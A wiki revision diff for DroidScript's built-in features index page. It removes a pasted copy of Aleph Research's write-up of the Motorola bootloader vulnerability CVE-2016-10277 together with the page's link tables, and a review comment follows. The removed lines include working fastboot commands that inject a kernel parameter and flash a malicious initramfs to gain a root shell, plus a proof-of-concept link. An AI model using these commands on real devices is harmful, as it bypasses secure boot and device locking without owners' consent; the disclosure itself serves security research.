built_in:start

Differences

This shows you the differences between two versions of the page.

built_in:start [2018/12/30 13:41]
182.1.63.175 [Built-in features - DroidScript API]
built_in:start [2018/12/31 01:07]
Line 1: Line 1:
-Sources: 
-https://alephsecurity.com/2017/08/30/untethered-initroot/ 
-https://github.com/alephsecurity/initroot 
  
-initroot: Motorola Bootloader Kernel Cmdline Injection Secure Boot & Device Locking Bypass (CVE-2016-10277) 
- 
-By Roee Hay / Aleph Research, HCL Technologies 
- 
-Recap of the Vulnerability and the Tethered-jailbreak 
- 
-1. Vulnerable versions of the Motorola Android Bootloader (ABOOT) allow for kernel command-line injection. 
-2. Using a proprietary fastboot OEM command, only available in the Motorola ABOOT, we can inject, through USB, a parameter named initrd which allows us to force the Linux kernel to populate initramfs into rootfs from a specified physical address. 
-3. We can abuse the ABOOT download functionality in order to place our own malicious initramfs at a known physical address, named SCRATCH_ADDR (see here for a list of devices). 
-4. Exploiting the vulnerability allows the adversary to gain unconfined root shell. 
-5. Since the initramfs payload is injected into RAM by the adversary, the vulnerability must be re-exploited on every reboot. 
-For example, here is a successful run of the exploit on cedric (Moto G5) 
- 
-$ fastboot oem config fsg-id "a initrd=0xA2100000,1588598"  
-$ fastboot flash aleph initroot-cedric.cpio.gz  
-$ fastboot continue 
- 
-$ adb shell  
-cedric:/ # id 
-uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3014(readproc) context=u:r:kernel:s0 
-cedric:/ # getenforce 
-Permissive 
-cedric:/ # 
- 
- 
-Proof of Concept: 
-https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42601.zip 
- 
-             
-====Links==== 
-^App and Layout^ 
-| [[app|app object]] | 
-| [[built_in:app_events|App Events]] | 
-| [[built_in:layouts|Layouts]]| 
-==== Controls ==== 
-^ Controls                                                   ^ 
-| [[built_in:audiorecorder|AudioRecorder control]]           | 
-| [[built_in:bluetoothlist|BluetoothList control]]           | 
-| [[built_in:bluetoothserial|BluetoothSerial control]]       | 
-| [[built_in:buttons|Button control]]                        | 
-| [[built_in:cameraview|CameraView control]]                 | 
-| [[built_in:checkboxes|CheckBoxes]]                         | 
-| [[built_in:crypt|Crypt control]]                           | 
-| [[built_in:database|Database control]]                     | 
-| [[built_in:dialog|Dialog control]]                         | 
-| [[built_in:downloader|Downloader]]                         | 
-| [[built_in:email|Email control]]                           | 
-| [[built_in:create_file|File control]]                      | 
-| [[built_in:glview|GLView control]]                         | 
-| [[built_in:images|Image control]]                          | 
-| [[built_in:ioio|IOIO control]]                             | 
-| [[built_in:listdialog|ListDialog control]]                 | 
-| [[built_in:lists|List control]]                            | 
-| [[built_in:listview|ListView]]                             | 
-| [[built_in:locator|Locator control]]                       | 
-| [[built_in:mediaplayer|MediaPlayer control]]               | 
-| [[built_in:mediastore|MediaStore control]]                 | 
-| [[built_in:netclient|NetClient control]]                   | 
-| [[built_in:notification|Notification control]]             | 
-| [[built_in:nxt|NXT control]]                               | 
-| [[built_in:nxtinfo|NxtInfo control]]                       | 
-| [[built_in:nxtremote|NxtRemote control]]                   | 
-| [[built_in:scroller|Scroller control]]                     | 
-| [[built_in:seekbars|Seekbar control]]                      | 
-| [[built_in:sensors|Sensor control]]                        | 
-| [[built_in:service|Service control]]                       | 
-| [[built_in:smartwatch|SmartWatch control]]                 | 
-| [[built_in:sms|SMS control]]                               | 
-| [[built_in:speechrecognition|Speech Recognition control]]  | 
-| [[built_in:spinner|Spinner control]]                       | 
-| [[built_in:synth|Synth control]]                           | 
-| [[built_in:tabs|Tabs control]]                             | 
-| [[built_in:text|Text control]]                             | 
-| [[built_in:textedit|TextEdit control]]                     | 
-| [[built_in:togglebuttons|ToggleButton control]]            | 
-| [[built_in:usbserial|USBSerial control]]                   | 
-| [[built_in:videoview|VideoView control]]                   | 
-| [[built_in:webserver|WebServer control]]                   | 
-| [[built_in:webview|WebView control]]                       | 
-| [[built_in:yesnodialog|YesNoDialog]]                       | 
-| [[built_in:zip|ZipUtil control]]                           | 
- 
----- 
- 
- 
-====Note for contributors==== 
-If you wish to create a new page in the **Built-in features** namespace, please create a link to the new page above, save this page and click on the link you just created. 
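
Review bot: The removal runs past the pasted initroot write-up and also deletes the page's own index, from the ====Links==== heading through the ==== Controls ==== table to the "Note for contributors" paragraph, with no replacement lines shown. If the intent was only to drop the unrelated CVE-2016-10277 material (the "Sources:" lines through the "Proof of Concept:" link), restore the index tables and the contributor note from the last clean revision so built_in:start still links to its subpages. Since the 2018/12/30 13:41 revision is attributed to an IP address rather than a named account, it is also worth checking whether other pages in the built_in namespace received the same paste.
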
built_in/start.txt · Last modified: 2018/12/31 01:07 (external edit)